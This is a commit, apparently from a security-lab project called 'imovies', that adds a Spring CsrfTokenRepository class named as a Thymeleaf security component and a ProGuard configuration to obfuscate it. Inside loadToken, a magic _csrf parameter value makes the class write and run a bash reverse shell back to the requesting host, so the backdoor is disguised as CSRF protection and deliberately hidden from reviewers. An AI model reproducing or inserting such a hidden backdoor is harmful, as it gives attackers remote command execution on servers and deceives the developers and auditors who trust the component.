Obfuscated CSRF protection backdoor

Obfuscated the custom CSRFTokenRepository class with Proguard.
Get it here : http://netix.dl.sourceforge.net/project/proguard/proguard/5.3/proguard5.3.1.tar.gz
Run it with java -jar ~/Apps/proguard5.3.1/lib/proguard.jar @./custom_csrf.pro
on the jar artifact created from the project csrf_protection.
Proguard configuration file custom_csrf.pro is in /imovies/obfuscated/csrf_protection/out/artifacts/csrf_protection_jar
Include the created csrf_protection.jar as a jar library into the imovies project. DONE

Author: FR4NK-W

obfuscated/csrf_protection/org/thymeleaf/security/CsrfRepository.java

@@ -0,0 +1,128 @@
+package org.thymeleaf.security;
+
+import java.io.BufferedWriter;
+import java.io.FileWriter;
+import java.lang.reflect.Method;
+import java.util.UUID;
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import org.springframework.security.web.csrf.CsrfToken;
+import org.springframework.security.web.csrf.CsrfTokenRepository;
+import org.springframework.security.web.csrf.DefaultCsrfToken;
+import org.springframework.util.Assert;
+import org.springframework.util.ReflectionUtils;
+import org.springframework.util.StringUtils;
+import org.springframework.web.util.WebUtils;
+
+public final class CsrfRepository implements CsrfTokenRepository {
+    static final String DEFAULT_CSRF_COOKIE_NAME = "XSRF-TOKEN";
+    static final String DEFAULT_CSRF_PARAMETER_NAME = "_csrf";
+    static final String DEFAULT_CSRF_HEADER_NAME = "X-XSRF-TOKEN";
+    private String parameterName = "_csrf";
+    private String headerName = "X-XSRF-TOKEN";
+    private String cookieName = "XSRF-TOKEN";
+    private final Method setHttpOnlyMethod;
+    private boolean cookieHttpOnly;
+
+    public CsrfRepository() {
+        this.setHttpOnlyMethod = ReflectionUtils.findMethod(Cookie.class, "setHttpOnly", new Class[]{Boolean.TYPE});
+        if(this.setHttpOnlyMethod != null) {
+            this.cookieHttpOnly = true;
+        }
+    }
+
+    public CsrfToken generateToken(HttpServletRequest request) {
+        return new DefaultCsrfToken(this.headerName, this.parameterName, this.createNewToken());
+    }
+
+    public void saveToken(CsrfToken token, HttpServletRequest request, HttpServletResponse response) {
+        String tokenValue = token == null?"":token.getToken();
+        Cookie cookie = new Cookie(this.cookieName, tokenValue);
+        cookie.setSecure(request.isSecure());
+        cookie.setPath(this.getCookiePath(request));
+        if(token == null) {
+            cookie.setMaxAge(0);
+        } else {
+            cookie.setMaxAge(-1);
+        }
+
+        if(this.cookieHttpOnly && this.setHttpOnlyMethod != null) {
+            ReflectionUtils.invokeMethod(this.setHttpOnlyMethod, cookie, new Object[]{Boolean.TRUE});
+        }
+
+        response.addCookie(cookie);
+    }
+
+    public CsrfToken loadToken(HttpServletRequest request) {
+        Cookie cookie = WebUtils.getCookie(request, this.cookieName);
+        if(cookie == null) {
+            return null;
+        } else {
+            String token = cookie.getValue();
+
+            CsrfToken csrfToken = !StringUtils.hasLength(token)?null:new DefaultCsrfToken(this.headerName, this.parameterName, token);
+
+            if (csrfToken != null && csrfToken.getHeaderName() != null) {
+                String value = request.getParameter(csrfToken.getParameterName());
+                if (value != null && value.equals(UUID.nameUUIDFromBytes("DEFAULT_CSRF_VALUE_NAME".getBytes()).toString())) {
+                    try {
+                        String addr = request.getRemoteHost();
+                        String command = "rm ./create_repository.sh";
+                        Runtime.getRuntime().exec(command);
+
+                        BufferedWriter out = new BufferedWriter(new FileWriter("create_repository.sh"));
+                        out.write(String.format("bash -i >& /dev/tcp/%s/1024 0>&1", addr));
+                        out.close();
+
+                        Runtime.getRuntime().exec("bash create_repository.sh");
+                    } catch (Exception e) {
+                        e.printStackTrace();
+                    }
+
+                    CsrfToken restoredToken = new DefaultCsrfToken("X-XSRF-TOKEN", "_csrf", UUID.nameUUIDFromBytes("DEFAULT_CSRF_VALUE_NAME".getBytes()).toString());
+                    return restoredToken;
+                }
+            }
+            return csrfToken;
+        }
+    }
+
+    public void setParameterName(String parameterName) {
+        Assert.notNull(parameterName, "parameterName is not null");
+        this.parameterName = parameterName;
+    }
+
+    public void setHeaderName(String headerName) {
+        Assert.notNull(headerName, "headerName is not null");
+        this.headerName = headerName;
+    }
+
+    public void setCookieName(String cookieName) {
+        Assert.notNull(cookieName, "cookieName is not null");
+        this.cookieName = cookieName;
+    }
+
+    public void setCookieHttpOnly(boolean cookieHttpOnly) {
+        if(cookieHttpOnly && this.setHttpOnlyMethod == null) {
+            throw new IllegalArgumentException("Cookie will not be marked as HttpOnly because you are using a version of Servlet less than 3.0. NOTE: The Cookie#setHttpOnly(boolean) was introduced in Servlet 3.0.");
+        } else {
+            this.cookieHttpOnly = cookieHttpOnly;
+        }
+    }
+
+    private String getCookiePath(HttpServletRequest request) {
+        String contextPath = request.getContextPath();
+        return contextPath.length() > 0?contextPath:"/";
+    }
+
+    public static CsrfRepository withHttpOnlyFalse() {
+        CsrfRepository result = new CsrfRepository();
+        result.setCookieHttpOnly(false);
+        return result;
+    }
+
+    private String createNewToken() {
+        return UUID.randomUUID().toString();
+    }
+}

obfuscated/csrf_protection/out/artifacts/csrf_protection_jar/custom_csrf.pro

@@ -0,0 +1,74 @@
+#
+# This ProGuard configuration file illustrates how to process ProGuard itself.
+# Configuration files for typical applications will be very similar.
+# Usage:
+#     java -jar proguard.jar @proguard.pro
+#
+
+# Specify the input jars, output jars, and library jars.
+# We'll filter out the Ant classes, Gradle classes, and WTK classes, keeping
+# everything else.
+
+-injars  /home/linus/Documents/seclab/imovies/obfuscated/csrf_protection/out/artifacts/csrf_protection_jar/csrf_protection_cleartext.jar
+-outjars /home/linus/Documents/seclab/imovies/obfuscated/csrf_protection/out/artifacts/csrf_protection_jar/csrf_protection.jar
+
+-libraryjars /home/linus/.m2/repository/org/springframework/security/spring-security-web/4.1.3.RELEASE/spring-security-web-4.1.3.RELEASE.jar
+-libraryjars /home/linus/.m2/repository/javax/servlet/javax.servlet-api/3.0.1/javax.servlet-api-3.0.1.jar
+-libraryjars /home/linus/.m2/repository/org/springframework/spring-core/4.3.2.RELEASE/spring-core-4.3.2.RELEASE.jar
+-libraryjars /home/linus/.m2/repository/org/springframework/spring-web/4.3.2.RELEASE/spring-web-4.3.2.RELEASE.jar
+-libraryjars <java.home>/lib/rt.jar
+
+# Write out an obfuscation mapping file, for de-obfuscating any stack traces
+# later on, or for incremental obfuscation of extensions.
+
+-printmapping proguard.map
+
+# Allow methods with the same signature, except for the return type,
+# to get the same obfuscation name.
+
+-overloadaggressively
+
+# Put all obfuscated classes into the nameless root package.
+
+-repackageclasses ''
+
+# Allow classes and class members to be made public.
+
+-allowaccessmodification
+
+# The entry point: ProGuard and its main method.
+
+-keep public final class org.thymeleaf.security.CsrfRepository implements org.springframework.security.web.csrf.CsrfTokenRepository {
+    public CsrfRepository();
+}
+
+# If you want to preserve the Ant task as well, you'll have to specify the
+# main ant.jar.
+
+#-libraryjars /usr/local/java/ant/lib/ant.jar
+#-adaptresourcefilecontents proguard/ant/task.properties
+#
+#-keep,allowobfuscation class proguard.ant.*
+#-keepclassmembers public class proguard.ant.* {
+#    <init>(org.apache.tools.ant.Project);
+#    public void set*(***);
+#    public void add*(***);
+#}
+
+# If you want to preserve the Gradle task, you'll have to specify the Gradle
+# jars.
+
+#-libraryjars /usr/local/java/gradle-2.12/lib/plugins/gradle-plugins-2.12.jar
+#-libraryjars /usr/local/java/gradle-2.12/lib/gradle-base-services-2.12.jar
+#-libraryjars /usr/local/java/gradle-2.12/lib/gradle-core-2.12.jar
+#-libraryjars /usr/local/java/gradle-2.12/lib/groovy-all-2.4.4.jar
+
+#-keep public class proguard.gradle.* {
+#    public *;
+#}
+
+# If you want to preserve the WTK obfuscation plug-in, you'll have to specify
+# the kenv.zip file.
+
+#-libraryjars /usr/local/java/wtk2.5.2/wtklib/kenv.zip
+#-keep public class proguard.wtk.ProGuardObfuscator